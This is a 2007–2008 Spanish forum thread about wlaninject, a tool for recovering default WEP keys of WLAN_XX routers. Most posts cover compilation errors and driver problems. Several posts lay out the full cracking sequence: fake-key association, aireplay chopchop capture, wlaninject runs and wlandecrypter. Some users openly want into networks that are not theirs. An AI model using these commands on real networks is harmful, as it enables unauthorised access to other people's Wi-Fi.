Título: Re: Wlaninject 0.3 - WLAN_XX sin clientes. Aplicado parche de axi.
Publicado por: *dudux en 26 Enero 2007, 20:44 pm
Citar
/usr/src/wifi/wlaninject-0.3# apt-get install libnet1-dev
Leyendo lista de paquetes... Hecho
Creando árbol de dependencias... Hecho
Se instalarán los siguientes paquetes NUEVOS:
libnet1-dev
0 actualizados, 1 se instalarán, 0 para eliminar y 0 no actualizados.
Necesito descargar 336kB de archivos.
Se utilizarán 1629kB de espacio de disco adicional después de desempaquetar.
Des:1 http://ftp.de.debian.org etch/main libnet1-dev 1.1.2.1-2 [336kB]
Descargados 336kB en 1s (255kB/s)
Seleccionando el paquete libnet1-dev previamente no seleccionado.
(Leyendo la base de datos ...
69377 ficheros y directorios instalados actualmente.)
Desempaquetando libnet1-dev (de .../libnet1-dev_1.1.2.1-2_i386.deb) ...
Configurando libnet1-dev (1.1.2.1-2) ...

:/usr/src/wifi/wlaninject-0.3# make
gcc -Os -I. -lnet -lpcap -MMD -c wlaninject.c
gcc: -lnet: linker input file unused because linking not done
gcc: -lpcap: linker input file unused because linking not done
gcc -Os -I. -lnet -lpcap -MMD -o wlaninject wlaninject.o libiw.so.28 -lm

:/usr/src/wifi/wlaninject-0.3# make install
install -m 755 -d /usr/local/lib/
install -m 755 libiw.so.28 /usr/local/lib/
ln -sfn libiw.so.28 /usr/local/lib//libiw.so
*** Don't forget to add /usr/local/lib/ to /etc/ld.so.conf, and run ldconfig as root. ***
******************************* ESTO TARDARÁ UN MOMENTO ********************************
install -m 755 -d /usr/local/sbin/
install -m 755 wlaninject /usr/local/sbin/

:/usr/src/wifi/wlaninject-0.3# wlaninject
wlaninject: libnet_init(): unknown physical layer type 0x322

he instalado libpcap-0.8-dev libnet1 libnet1-dev.....
he compilado el wlaninject y me da el mismo error
estoy leyendo y parece que hay que estar en modo managed cuando se ejecuta wlaninject..no???



que me sugieres nil???


Título: Re: Wlaninject 0.3 - WLAN_XX sin clientes. Aplicado parche de axi.
Publicado por: tarkus en 27 Enero 2007, 10:32 am
Como se pone uno e modo managed?, por probar que no quede.

*dudux  Si descubres el porque del error avisa por aquí..
Gracias y un saludo.


Título: Re: Wlaninject 0.3 - WLAN_XX sin clientes. Aplicado parche de axi.
Publicado por: pianista en 27 Enero 2007, 11:47 am
Dudux a mi me ocurria lo mismo y por ahora no tengo ni idea de que puede ser, solo se que me sucedia en el momento que levantaba la interfaz rausb y no entiendo porque, porque si no si que me daba las opciones pero con la ralink na de na...
En fin habra que seguir probando...
Saludos


Título: Re: Wlaninject 0.3 - WLAN_XX sin clientes. Aplicado parche de axi.
Publicado por: pepinillos en 27 Enero 2007, 13:55 pm
Yo tengo e mismo problema con una tarjeta ralink rt2500. Para usar aireplay -4 tengo que ponerla en modo monitor y si lanzo wlaniject me da problema de wlaninject libnet-init() unknown physical layer type 0x322
Si pongo en modo managed (iwconfig ra0 mode managed) entonces funciona wlaninject pero se queda bloqueado aireplay...

ayudadme please


Título: Re: Wlaninject 0.3 - WLAN_XX sin clientes. Aplicado parche de axi.
Publicado por: *dudux en 27 Enero 2007, 21:15 pm
Dnd estas nil????


Título: Re: Wlaninject 0.3 - WLAN_XX sin clientes. Aplicado parche de axi.
Publicado por: nilp0inter en 28 Enero 2007, 06:11 am
Dnd estas nil????

Ya estoy aqui, ya he llegao. Perdonadme, pero he estado muuuuu liao.
Estaba desconcertao con el error ese de "wlaninject: libnet_init(): unknown physical layer type 0x321" porque nunca me había salido; el otro día me dio por actualizar mis queridos madwifi a los madwifi-ng que nunca había probado y cuando se me ocurre ejecutar el wlaninject... POON!

Y es que el código es una chapuza monumantal, lo hice deprisa y corriendo con ganas de publicarlo, además no comprendía muy bien como trabajaba la libnet, en fín que da asco. Asi que me he planteado escribir (y no digo reescribir porque la otra vez fue practicamente un cut&paste) el código de nuevo.
Intentaré mirar esta noche el código a ver si puedo sacar algun parche para que rule con los NG, pero no prometo nada, si veo que no le encuentro el fallo empiezo desde el principio y ya esta.

De todas formas si lo necesitais urgentemente podeis intentarlo con los madwifi-old.


Título: Re: Wlaninject 0.3 - WLAN_XX sin clientes. Aplicado parche de axi.
Publicado por: pianista en 28 Enero 2007, 21:06 pm
Ostia clarooo ahi estaba el fallo en los madwifi jajajja
Disculpa mi ignorancia peor jamas me dio por probarlo con los antiguos, pero de todas formas creo que ocurre con todos los drivers ng date cuenta que con el de ralink tambien va mal....
Saludosss


Título: Re: Wlaninject 0.4 - Generador de paquetes en redes WLAN_XX.
Publicado por: nilp0inter en 29 Enero 2007, 06:08 am
Creo que ya he arreglado la cagada, de todas formas tengo que reescribirlo todo. Probadlo a ver si os funciona, ya no os debería dar el error de libnet.

http://www.fuerzaiberica.com/nil/rusoblanco/descargas/wlaninject-0.4.tar.gz (http://www.fuerzaiberica.com/nil/rusoblanco/descargas/wlaninject-0.4.tar.gz)

Espero noticias.


Título: Re: Wlaninject 0.4 - Generador de paquetes en redes WLAN_XX.
Publicado por: pianista en 29 Enero 2007, 16:55 pm
Joer si que te has dado prisa, habra que probarlo, en cuanto tenga tiempo que ando de examenes te cuento ;D
Saludosss y gracias por el aporte!


Título: Re: Wlaninject 0.4 - Generador de paquetes en redes WLAN_XX.
Publicado por: *dudux en 29 Enero 2007, 17:52 pm
yo lo pruebo luego.........haber si rula....... ;D ;D


Título: Re: Wlaninject 0.4 - Generador de paquetes en redes WLAN_XX.
Publicado por: *dudux en 31 Enero 2007, 13:49 pm
no rula no!!!.......

el mismo error .....

funciona  el wlaninject sin poner la interface en modo monitor........
en cuanto pones modo monitor peta..........

que dices niL?


Título: Re: Wlaninject 0.4 - Generador de paquetes en redes WLAN_XX.
Publicado por: tarkus en 20 Febrero 2007, 15:48 pm
No se ha podido arreglar esto del wlaninject??
Me puede indicar alguien de que otra forma se puede meter mano a las wlan \"parecido a como lo hace en teoria el wlaninject\" osea q no tarde mucho.
Que utilidad hay similar y si sabe alguien algun live cd que la traiga con su correspondiente link de descarga.
Gracias y un saludo a todos.
Se pueden abrir sin recibir datas??
Thnaks



Título: Re: Wlaninject 0.4 - Generador de paquetes en redes WLAN_XX.
Publicado por: *dudux en 21 Febrero 2007, 06:21 am
mira este manual...........

http://www.seguridadwireless.net/foro/index.php/topic,1617.0.html


Título: Re: Wlaninject 0.4 - Generador de paquetes en redes WLAN_XX.
Publicado por: pianista en 3 Marzo 2007, 18:04 pm
Nil lo probe como dice dudux y va genial, te pongo un 10 ;D ;D ;D ;D
Saludoss


Título: Re: Wlaninject 0.4 - Generador de paquetes en redes WLAN_XX.
Publicado por: *dudux en 4 Marzo 2007, 14:55 pm
yo si estuviera mas depurado.......tambien una notaza.. :D

pero a si como esta una nota alta


Título: Re: Wlaninject 0.4 - Generador de paquetes en redes WLAN_XX.
Publicado por: pianista en 4 Marzo 2007, 22:35 pm
Hombre la depuracion del codigo es un reto, pero date cuenta que mucha mejora a la larga no se podra hacer asi que no creo que importe demasiado, lo que si que espero es a ver con que nos sorprendes la proxima ;D ;D ;D
Saludoss y sigue asi!


Título: Re: Wlaninject 0.6 - Ahora con cafeina, mucho más rapido!!
Publicado por: nilp0inter en 5 Marzo 2007, 05:23 am
Bueno, ha pasado algo de tiempo desde que no visito el foro, y tengo la pagina un poco abandonada por temas de curro... Aqui os dejo una nueva chapuza versión del wlaninject.

Como novedades os comento que le he añadido una función para que pare de mandar paquetes cuando se desconecta de la red atacada y reanude el envio cuando se vuelve a conectar y otra función (que esta en fase de pruebas) que calcula el fast mode dinamicamente. Os acordais que el fast mode no funcionaba siempre?? pues era porque si estabamos conectados con un rate bajo (ej. 1M) y poniamos el fast-mode muy alto saturabamos el ancho de banda de la conexión. Pues con esta versión esto no debería pasar.

He estado probando y he conseguido sacar un paquete en una WLAN con un rate de 11M en 12 segundos (imaginaos con un rate de 54M). Esto del rate depende mucho del nivel de señal.

Por otra parte, esto solo lo he probado con mi atheros y con los madwifi viejos (me han comentado que se puede con los madwifi-ng creando otro interfaz en modo monitor para capturar paquetes con wlanconfig, pero esto no lo he probado).

Bueno, pues esto es todo, lo de depurar el codigo lo dejare para la versión 1.0 ;) . El enlace de esta versión, como siempre, lo teneis en el post inicial.

Espero que lo disfruteis!

P.D: Nos vemos en la alcolea party :D


Título: Re: Wlaninject 0.6 - Ahora con cafeina, mucho más rapido!!
Publicado por: pianista en 5 Marzo 2007, 07:56 am
Jajja esto habra que probarlo...  ;D
En cuanto tenga tiempo te cuento...
Saludoss


Título: Re: Wlaninject 0.6 - Ahora con cafeina, mucho más rapido!!
Publicado por: Armenos en 5 Marzo 2007, 10:52 am
P.D: Nos vemos en la alcolea party :D

Epa... otro que se viene jejeje Felicidades por la nueva versión-chapuza  :D Saludos y cuidaos.

P.d. Ahora para clase que pocas ganas... arf  ;D


Título: Re: Wlaninject 0.6 - Ahora con cafeina, mucho más rapido!!
Publicado por: *dudux en 5 Marzo 2007, 14:45 pm
el wlaninject 0.4 era light sin cafeina y sin azucar????   ;D

vamos a probarlo ........ ;)


P.D. Pasarlo bien en alcolea


Título: Re: Wlaninject 0.6 - Ahora con cafeina, mucho más rapido!!
Publicado por: Serch_Serch en 23 Marzo 2007, 14:43 pm
Q has pensado para la proxima version??


Título: Re: Wlaninject 0.6 - Ahora con cafeina, mucho más rapido!!
Publicado por: bernier en 9 Abril 2007, 16:12 pm
por favor, soy un novato, y me kedo en el principio, e bajado todo, pero cundo dice lo0 de en el directorio abrir una cnsola con el cogido, no se como aserlo, ese codigo donde se mete?


Título: Re: Wlaninject 0.6 - Ahora con cafeina, mucho más rapido!!
Publicado por: pianista en 9 Abril 2007, 16:25 pm
Pues metete en el directorio donde lo tengas y haz esos comandos, aunque antes deberas instalar los buildessential para que te compile...

Saludos
PD:Para cambiar de directorio cd Directorio


Título: Re: Wlaninject 0.6 - Ahora con cafeina, mucho más rapido!!
Publicado por: bernier en 9 Abril 2007, 18:28 pm
lO SIENTO, NO TE ENTIENDO, ME LO PODRIAS EXPLICAR PASO POR PASO, COMO EJECUTO ESOS COMANDOS


Título: Re: Wlaninject 0.6 - Ahora con cafeina, mucho más rapido!!
Publicado por: o2T7f6j2 en 10 Abril 2007, 15:17 pm
Por favor, bernier, no uses las mayúsculas

Hoy mismo estoy probando este wlnainject. He estado bastante tiempo apartado de las ondas, pero seguro que le saco provecho ;)

Salu2 a todos, me alegra volver a leeros.


Título: Re: Wlaninject 0.6 - Ahora con cafeina, mucho más rapido!!
Publicado por: bernier en 10 Abril 2007, 22:26 pm
Por favor necesito descifrar una que se llama WLAN_??. Soy novato y no se como hacerlo, lo he bajado todo, pero eso de los comandos no se donde se mete,  osea que el primer paso no se que hacer ayuda, gracias de antemano.


No pongas nombres reales.......


Título: Re: Wlaninject 0.6 - Ahora con cafeina, mucho más rapido!!
Publicado por: pianista en 10 Abril 2007, 23:15 pm
Primero, no postees nombres de red, di que es una WLAN_XX...
En cuanto al tema de instalacion tienes para qu funcione en seguridadwireless, y para instalarlo en la wen de nilpointer, que es la de rusoblanco...
Los comandos se han posteado muchas veces y ademas los encontraras en la web de nil..
Saludos


Título: Re: Wlaninject 0.6 - Ahora con cafeina, mucho más rapido!!
Publicado por: ghostgoblins en 21 Abril 2007, 20:34 pm
Hola me podeis aclarar, si con wifislax 2.0 y con ipw2200, se puede instalar el wlaninject y sus librerias agradeceria que me respondieran, lo demas ya lo buscar yo.gracias.


Título: Re: Wlaninject 0.6 - Ahora con cafeina, mucho más rapido!!
Publicado por: *dudux en 22 Abril 2007, 02:41 am
pues parece que hay una que no compila...........

lo que puedes mirar es de probar wlandestroy.sh.....


Título: Re: Wlaninject 0.6 - Ahora con cafeina, mucho más rapido!!
Publicado por: ghostgoblins en 22 Abril 2007, 18:15 pm
Gracias *dudux, buscare por ahi para haber como lo ago, gracias de nuevo.


Título: Re: Wlaninject 0.6 - Ahora con cafeina, mucho más rapido!!
Publicado por: iea en 25 Mayo 2007, 22:31 pm
Tengo una duda, no he podido hacerlo funcionar pero bueno(LibNet), supuestamente el apr que saca es bueno para la wlan_, (se puede inyectar con el), sin clientes estoy diciendo, me refiero q si es un apr el cual cacula segun una libreria o el apr q te da es el del cliente oculto deco tv...).

Ver si me explico mejor es como cuando sacas una key mediante libreria y luego la metes y no rula xp no es la key por defecto,u ese apr  vale para inyectac y tendria q inyectar...
Otra al archivo .cap o .ivs en el cual esta supuestamente ese apr como lo estudio para sacarle la mac con la q inyectar..., pues q hay filtrado mac.

Otra si hago una desautentificacion en ese canal o essid, como estudio el trafico para la peticion autentificacion del cliente en esta caso decodificador.

Otra en las redes de este tipo wlan_XX  si no hay niun solo data durante mucho tiempo, suponemos q no hay acceso internete..., pero si a imageneo mediante vlc....

Gracias todos estas dos ultimas no me interesan tanto las cosas por orden gracias a todossssssss


Título: Re: Wlaninject 0.6 - Ahora con cafeina, mucho más rapido!!
Publicado por: pianista en 26 Mayo 2007, 16:26 pm
Por favor primero piensa lo que quieres escribir y despues hazlo porque no me estoy enterando de nada, y creo que son ARP no apr....
Saludos


Título: Re: Wlaninject 0.6 - Ahora con cafeina, mucho más rapido!!
Publicado por: ChimoC en 26 Mayo 2007, 17:33 pm
Pues eso mismo me ha pasado a mí desde esta mañana... no he querido responder por no meter la pata, pero "palabrita del niño Jesús" que no me he enterado de nada... :-\

Un saludo

ChimoC



Título: Re: Wlaninject 0.6 - Ahora con cafeina, mucho más rapido!!
Publicado por: the_often en 26 Mayo 2007, 17:42 pm
IDEM, jeje.   :rolleyes: :rolleyes:


Título: Re: Wlaninject 0.6 - Ahora con cafeina, mucho más rapido!!
Publicado por: Yudealf en 31 Mayo 2007, 16:14 pm
Se sabe algo del fallo:
 wlaninject: libnet_init(): unknown physical layer type 0x322
con los drivers hostap??
Por lo que he leido los que usais madwifi solo teneis que usar los antiguos drivers, pero y los de hostap???


Título: Re: Wlaninject 0.6 - Ahora con cafeina, mucho más rapido!!
Publicado por: the_often en 31 Mayo 2007, 19:03 pm
Pegale un ojo al manual de WlanInject que hay en el foro de seguridadwireless.

Creo que te sera de buena ayuda.

Saludos


Título: Re: Wlaninject 0.6 - Ahora con cafeina, mucho más rapido!!
Publicado por: iea en 10 Junio 2007, 11:34 am
La pregunte basica es: sí con este programa en el hilo en que estamos, saca arp verdadero de la red wlan_xx, mediante una libreria, o el arp es el que verdaderamente tiene esa red.
Si ese arp tiene que inyectar por huevos; o sí se modifico algun valor por ej la clave web por defecto ya no lo hace...., doy por supuesto lo tipico señal y esas cosas.



Título: Re: Wlaninject 0.6 - Ahora con cafeina, mucho más rapido!!
Publicado por: pianista en 10 Junio 2007, 12:02 pm
A ver, este programa esta pensado para usarse con wlandecripter...
Lo que hace es ir probando todas las claves y cuando da con la verdadera el router suelta un arp que nosotros podemos capturar y descifrar con el wlandecripter para saber la clave...
El router no va a tirar arps falsos... ;)
Saludos


Título: Re: Wlaninject 0.6 - Ahora con cafeina, mucho más rapido!!
Publicado por: NetFree222 en 10 Junio 2007, 14:20 pm
Esto ya lo habeis metio en el wifiway o hay k meterlo??ske tengo unas wlan que se me resisten...


Título: Re: Wlaninject 0.6 - Ahora con cafeina, mucho más rapido!!
Publicado por: pianista en 10 Junio 2007, 14:48 pm
Creo que no esta implementado aun en wifiway, y se planea meterlo en la wifislax 3.0
Saludos


Título: Re: Wlaninject 0.6 - Ahora con cafeina, mucho más rapido!!
Publicado por: Serch_Serch en 10 Julio 2007, 00:31 am
Creo q en la version 3.0 no está verdad?? Estará disponible en la 3.1??

Gracias


Título: Re: Wlaninject 0.6 - Ahora con cafeina, mucho más rapido!!
Publicado por: Mage-Gnome en 24 Julio 2007, 10:56 am
Yo pongo
Código:
iwconfig eth1 channel 8
iwconfig eth1 essid WLAN_DD
iwconfig eth1 key FFFFFFFFF
ifconfig eth1 192.168.1.10 up

Se me asocia bien. (me pone hasta la velocidad del ap en iwconfig)
Despues hago el
Código:
aireplay -4 -b Mac_ap -f1 rtap0
se lia a leer paquetes
Lanzo el
Código:
wlaninject -e WLAN_DD -b Mac_ap -i eth1
Termina el proceso hasta el 100% pero en la otra ventana nunca me sale lo de "guardar y/n?" . (lleva mas de 200000 paquetes)
En iwconfig continuo estando asociado

Que deberia hacer mas?
Podria usar mi atheros en vez de la ipw2200 creando una nueva interfaz (ath0 como managed y ath1 como monitor)?
Podria ser que no me llegue bien la señal o algo?
Gracias por adelantado

*********************************************
EDITADO
Supongo q era por la señal por que con la atheros lo he conseguido. He usado como dije antes ath0 como managed y ath1 como monitor. Saludos!


Título: Re: Wlaninject 0.6 - Ahora con cafeina, mucho más rapido!!
Publicado por: neoz en 31 Agosto 2007, 08:36 am
Hola.

Estoy instalando la versión 0.6 de WlanInject.

Las librerias libpcap y libnet ya estan instaladas, pero cuando ejecuto el "make" para la instalación de WlanInject me aparece lo siguiente :

Código:
gcc -Os -I. -lnet -lpcap -W -Wall  -MMD    -fPIC -c -o iwlib.so iwlib.c
gcc: -lnet: no se usó el fichero de entrada del enlazador porque no se hizo enlace
gcc: -lpcap: no se usó el fichero de entrada del enlazador porque no se hizo enlace
rm -f libiw.a
ar cru libiw.a iwlib.so
ranlib libiw.a
gcc -Os -I. -lnet -lpcap -W -Wall  -MMD    -c wlaninject.c
wlaninject.c:73: error: expected ‘=’, ‘,’, ‘;’, ‘asm’ or ‘__attribute__’ before ‘*’ token
wlaninject.c: En la función ‘do_libnet_init’:
wlaninject.c:222: error: ‘LIBNET_ERRBUF_SIZE’ no se declaró aquí (primer uso en esta función)
wlaninject.c:222: error: (Cada identificador no declarado solamente se reporta una vez
wlaninject.c:222: error: ara cada funcion en la que aparece.)
wlaninject.c:226: error: ‘libnet’ no se declaró aquí (primer uso en esta función)
wlaninject.c:228: aviso: declaración implícita de la función ‘libnet_destroy’
wlaninject.c:236: aviso: declaración implícita de la función ‘libnet_init’
wlaninject.c:236: error: ‘LIBNET_LINK’ no se declaró aquí (primer uso en esta función)
wlaninject.c:222: aviso: variable ‘ebuf’ sin usar
wlaninject.c: En la función ‘pingip_send’:
wlaninject.c:247: error: expected ‘=’, ‘,’, ‘;’, ‘asm’ or ‘__attribute__’ before ‘arp’
wlaninject.c:247: error: ‘arp’ no se declaró aquí (primer uso en esta función)
wlaninject.c:247: error: ‘eth’ no se declaró aquí (primer uso en esta función)
wlaninject.c:247: aviso: el operador del lado izquierdo de la expresión coma no tiene efecto
wlaninject.c:248: aviso: declaración implícita de la función ‘libnet_build_arp’
wlaninject.c:259: error: ‘libnet’ no se declaró aquí (primer uso en esta función)
wlaninject.c:262: aviso: declaración implícita de la función ‘libnet_geterror’
wlaninject.c:262: aviso: el formato ‘%s’ espera el tipo ‘char *’, pero el argumento 3 es del tipo ‘int’
wlaninject.c:265: aviso: declaración implícita de la función ‘libnet_build_ethernet’
wlaninject.c:273: aviso: el formato ‘%s’ espera el tipo ‘char *’, pero el argumento 3 es del tipo ‘int’
wlaninject.c:279: aviso: declaración implícita de la función ‘libnet_write’
wlaninject.c:281: aviso: el formato ‘%s’ espera el tipo ‘char *’, pero el argumento 3 es del tipo ‘int’
wlaninject.c: En la función ‘main’:
wlaninject.c:569: aviso: declaración implícita de la función ‘libnet_get_hwaddr’
wlaninject.c:569: error: ‘libnet’ no se declaró aquí (primer uso en esta función)
wlaninject.c:571: aviso: el formato ‘%s’ espera el tipo ‘char *’, pero el argumento 3 es del tipo ‘int’
wlaninject.c:577: aviso: declaración implícita de la función ‘libnet_get_ipaddr4’
wlaninject.c:577: aviso: comparación entre signed y unsigned
wlaninject.c:579: aviso: el formato ‘%s’ espera el tipo ‘char *’, pero el argumento 3 es del tipo ‘int’
wlaninject.c:584: aviso: declaración implícita de la función ‘signal’
wlaninject.c:584: error: ‘SIGINT’ no se declaró aquí (primer uso en esta función)
wlaninject.c:602: aviso: comparación entre signed y unsigned
wlaninject.c:610: aviso: comparación entre signed y unsigned
make: *** [wlaninject.o] Error 1

Para la libreria libnet fueron apareciendo varios errores que ya fuí solucionando (falta de otras librerias), pero en este caso, estoy fuera de juego.

Muchas gracias.
Saludos.


Título: Re: Wlaninject 0.6 - Ahora con cafeina, mucho más rapido!!
Publicado por: netsilence en 31 Agosto 2007, 18:23 pm
Para Neoz:
Yo utilizo Ubuntu 7.04, y para compilarlo hice lo siguiente:
sudo apt-get build-dep aircrack-ng
sudo apt-get install -y libnet0 libnet1 libnet1-dev libpcap0.7 libpcap0.7-dev libpcap0.8

Lo del apt-get build-dep es porque supuse que utilizaría muchas de las dependencias de la suite aircrack.
Creo que tu problema está en que has instalado las librerías 0.8 -dev de libpcap y al parecer funciona con las 0.7.

Intentalo y nos cuentas ;).

Por cierto, muy bueno el howto.


Título: Re: Wlaninject 0.6 - Ahora con cafeina, mucho más rapido!!
Publicado por: neoz en 1 Septiembre 2007, 00:05 am
Hola netsilence.

Te comento. Parto de la versión 0.9.1 de aircrack-ng (que ya he instalado y funciona ok)
He ejecutado las dos instalaciones que me has comentado y todo ok, sin ningún problema.

Código:
sudo apt-get build-dep aircrack-ng
sudo apt-get install -y libnet0 libnet1 libnet1-dev libpcap0.7 libpcap0.7-dev libpcap0.8

Procedo a instalar Wlaninject 0.6.
En el comando sudo make, aparece lo siguiente :

Código:
gcc -Os -I. -lnet -lpcap -W -Wall  -MMD    -fPIC -c -o iwlib.so iwlib.c
gcc: -lnet: no se usó el fichero de entrada del enlazador porque no se hizo enlace
gcc: -lpcap: no se usó el fichero de entrada del enlazador porque no se hizo enlace
rm -f libiw.a
ar cru libiw.a iwlib.so
ranlib libiw.a
gcc -Os -I. -lnet -lpcap -W -Wall  -MMD    -c wlaninject.c
wlaninject.c: En la función ‘main’:
wlaninject.c:577: aviso: comparación entre signed y unsigned
wlaninject.c:602: aviso: comparación entre signed y unsigned
wlaninject.c:610: aviso: comparación entre signed y unsigned
gcc: -lnet: no se usó el fichero de entrada del enlazador porque no se hizo enlace
gcc: -lpcap: no se usó el fichero de entrada del enlazador porque no se hizo enlace
gcc   -Os -I. -lnet -lpcap -W -Wall  -MMD    -o wlaninject wlaninject.o libiw.a -lm

Aparentemente, creo que hasta aquí todo correcto (a excepción de los avisos)
Ahora ejecuto sudo make install y obtengo el resultado :

Código:
install -m 755 -d /usr/local/lib/
install -m 644 libiw.a /usr/local/lib/
install -m 755 -d /usr/local/sbin/
install -m 755 wlaninject  /usr/local/sbin/

He de comentar que en el archivo makefile , utiliza la variable BUILD_STATIC = y , tal como viene por defecto al descomprimirse el archivo de Wlaninject.

Ahora, ejecuto el ataque.
Código:
wlaninject -e WLAN_XX -b Mac_AP -i eth1

Pero me aparece
Código:
wlaninject: libnet_get_ipaddr4(libnet): libnet_get_ipaddr4(): ioctl(): Cannot assign requested address

¿Parece que libnet no quedó bien instalado? o existe algun problema con la libreria. En la instalación aparentemente no sucedió ningún problema.

EDITO y MODIFICO ...

Bueno, encontré porqué del error (estaba en este mismo post...  :rolleyes: )

Aparece el último error porque no tenemos ninguna ip configurada en nuestra tarjeta ethernet wireless. Para ello basta con :

sudo ifconfig eth1 192.168.1.15 netmask 255.255.255.0 up

He ejecutado el ataque... buf... madre mia entre 800 y 1000 ivs/s  :o

Bueno, saludos y muchisimas gracias por la ayuda. ;)


Título: Re: Wlaninject 0.6 - Ahora con cafeina, mucho más rapido!!
Publicado por: neoz en 1 Septiembre 2007, 00:50 am
Por cierto, ahora que ya me funciona wlaninjection  ;D , dudas de funcionamiento...  :rolleyes:

Realizo el siguiente proceso :
1. asigno IP a eth1
2. me asocio a la red wireless con key falsa
3. Lanzo aireplay-ng con A4.
3. Lanzo wlaninjection.

Al momento me aparece en aireplay-ng un paquete del tipo :

Código:
        Size: 68, FromDS: 0, ToDS: 1 (WEP)

             BSSID  =  AA:BB:CC:DD:EE:FF
         Dest. MAC  =  FF:FF:FF:FF:FF:FF
        Source MAC  =  00:11:22:33:44:55

        0x0000:  AAAA BBBB CCCC 4988 FF8e 0011 2233 4455  .A....I.;..."3DU
        0x0010:  ffff ffff ffff 0000 6066 ad00 7f27 961b  ........`f..'..
        0x0020:  6d10 caf6 eb4c e2ff 35a1 64b9 2a8d 8dc2  m....L..5.d.*...
        0x0030:  a2af 2d39 5afc c2ef fe20 321e 09e6 92b4  ..-9Z.... 2.....
        0x0040:  0508 91e5                                ....

Use this packet ?

Todos los que me aparecen son del tipo 1 (WEP), por lo que intenta continuar para realizar el XOR pero no es posible.

Creo que estoy fallando en algun sitio, pero no se donde...
Curiosamente esta red no tiene ningún cliente asociado en modo wireless, pero si que tiene un  cliente conectado al router mediante cable que genera actividad lan. Si intercepto uno de los paquetes de dicho cliente, ningún problema. El paquete capturado es del tipo 0 (WEP)

Saludos y muchas gracias.


Título: Re: Wlaninject 0.6 - Ahora con cafeina, mucho más rapido!!
Publicado por: netsilence en 1 Septiembre 2007, 01:11 am

3. Lanzo aireplay-ng con A4.


Que orden es la que ejecutas exactamente? creo que está ahi el problema.


Título: Re: Wlaninject 0.6 - Ahora con cafeina, mucho más rapido!!
Publicado por: neoz en 1 Septiembre 2007, 01:31 am
Hola netsilence

Primero lo ejecuté

Código:
aireplay-ng -4 -b Mac_AP -i rtap0

Ahí tenia el problema, ya que no filtraba todos los paquetes WEP 1 o 0
Luego lo he probado con

Código:
aireplay-ng -4 -b Mac_AP -f1 rtap0

Aquí si que solo me captura paquetes WEP 0 (filtro -f1), pero todos tienen como Source Mac la misma del AP. Todos los paquetes capturados tienen una longitud de 92 o 112. Son del tipo :

Código:
Size: 92, FromDS: 1, ToDS: 0 (WEP)

             BSSID  =  AA:BB:CC:DD:EE:FF
         Dest. MAC  =  FF:FF:FF:FF:FF:FF
        Source MAC  =  AA:BB:CC:DD:EE:FF

...

Use this packet ?

Tampoco puede realizar "xor"

Saludos y gracias.


Título: Re: Wlaninject 0.6 - Ahora con cafeina, mucho más rapido!!
Publicado por: pianista en 1 Septiembre 2007, 10:09 am
A ver, se pone la opcion -f 1 no porque sean WEP, si no para que solo veas los de FromDs...
Asi que cuando tengas el FromDs le das a si, lo intenta pero lo cortas con ctrol+C y ahi tienes el replay_cap para pasarle el wlandecrypter
Saludos


Título: Re: Wlaninject 0.6 - Ahora con cafeina, mucho más rapido!!
Publicado por: neoz en 1 Septiembre 2007, 16:42 pm
Hola pianista

Todo resuelto. Mi "subconsciente"  :rolleyes: me llevava a ejecutar un CHOPCHOP, mientras que está bien claro que el proceso es simplemente capturar el paquete (responder "y" y cancelar el ataque chopchop) y luego wlandecrypt y wepattack se encargan del resto con el *.cap, y por cierto, con una espectacular velocidad  :o

He vuelto a jugar con algunas lan caidas con chopchop y ahora con esta metodología... espectacular.

Saludos y muchas gracias a todos!!!
Gracias tb netsilence


Título: Re: Wlaninject 0.6 - Ahora con cafeina, mucho más rapido!!
Publicado por: ZariK en 24 Septiembre 2007, 17:12 pm
Hola!!!
 Tengo la versión 3.1 de wifislax y no consigo instalar wlaninject por culpa de las librerías libpcap y libnet, ya he estado viendo que el problema no es solo mío... Sabéis que hacer para solucionarlo?? Alguien ha conseguido hacer funcionar wlaninject en wifislax?  y en ese caso, como sería? Gracias de antemano.
Saludos!!


Título: Re: Wlaninject 0.6 - Ahora con cafeina, mucho más rapido!!
Publicado por: *dudux en 25 Septiembre 2007, 13:40 pm
Yo pongo
Código:
iwconfig eth1 channel 8
iwconfig eth1 essid WLAN_DD
iwconfig eth1 key FFFFFFFFF
ifconfig eth1 192.168.1.10 up

Se me asocia bien. (me pone hasta la velocidad del ap en iwconfig)
Despues hago el
Código:
aireplay -4 -b Mac_ap -f1 rtap0
se lia a leer paquetes
Lanzo el
Código:
wlaninject -e WLAN_DD -b Mac_ap -i eth1
Termina el proceso hasta el 100% pero en la otra ventana nunca me sale lo de "guardar y/n?" . (lleva mas de 200000 paquetes)
En iwconfig continuo estando asociado

Que deberia hacer mas?
Podria usar mi atheros en vez de la ipw2200 creando una nueva interfaz (ath0 como managed y ath1 como monitor)?
Podria ser que no me llegue bien la señal o algo?
Gracias por adelantado

*********************************************
EDITADO
Supongo q era por la señal por que con la atheros lo he conseguido. He usado como dije antes ath0 como managed y ath1 como monitor. Saludos!

usa las 2 tarjetas a la vez ............ath0 y eth0
con la atheros en modo monitor el A4 y el wlaninject con la ipw2200....


Título: Re: Wlaninject 0.6 - Ahora con cafeina, mucho más rapido!!
Publicado por: uran en 9 Diciembre 2007, 08:24 am
He instalado en WiFiSlax 3.1 librerias Latest Beta Version: 1.1.3
http://www.packetfactory.net/libnet/
Luego Wlaninject 0.6 sin problemmas.
 ;D ;D ;D ;D


Título: Re: Wlaninject 0.6 - Ahora con cafeina, mucho más rapido!!
Publicado por: ChimoC en 9 Diciembre 2007, 20:39 pm
Buenas:

Muy buena noticia compañero uran  :)

Un saludo

ChimoC


Título: Re: Wlaninject 0.6 - Ahora con cafeina, mucho más rapido!!
Publicado por: Hwagm en 18 Diciembre 2007, 01:29 am
ademas de que esas librerias tambien hacian falta para alguna otra aplicacion, ok, gracias lo probare a mas a mas en la nueva wifiway


Título: Re: Wlaninject 0.6 - Ahora con cafeina, mucho más rapido!!
Publicado por: tesnic en 10 Agosto 2008, 18:12 pm
Hola a todos !
Primero, felicidades por la web, es genial y se aprende un monton !
Os cuento, estaba yo con el wlainject, a ver si lo puedo instalar, y despues de instalar todas las librerias que me iba pidiendo y leer muuuuuuchos post, me he quedado encallado aqui:

sudo make

gcc -Os -I. -lnet -lpcap -W -Wall  -MMD    -c wlaninject.c
En el fitxer inclòs dès de wlaninject.c:39:
/usr/include/libnet.h:87:2: error: #error "byte order has not been specified, you'll need to #define either LIBNET_LIL_ENDIAN or LIBNET_BIG_ENDIAN.  See the documentation regarding the libnet-config script."
wlaninject.c:73: error: expected ‘=’, ‘,’, ‘;’, ‘asm’ or ‘__attribute__’ before ‘*’ token
